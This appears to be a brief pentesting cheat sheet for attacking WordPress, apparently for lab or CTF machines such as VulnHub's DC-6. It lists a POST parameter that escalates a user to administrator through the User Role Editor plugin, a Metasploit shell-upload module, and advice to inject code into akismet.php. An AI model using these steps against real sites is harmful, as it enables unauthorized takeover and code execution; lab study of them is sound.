# Wordpress

## ure_user_roles

* [exploitdb 44595](https://exploit-db.com/exploits/44595.)
* [windsordeveloper](https://windsorwebdeveloper.com/dc-6-vulnhub-walkthrough/)

* Update user profile and append POST parameter to gain administrator role on user
```sh
&ure_other_roles=administrator
```

## Shell Upload

* Msfconsole
```sh
exploit/unix/webapp/wp_admin_shell_upload
```

## Template & Plugin Editing

* If template injection does not work, use plugin injection on `akismet.php`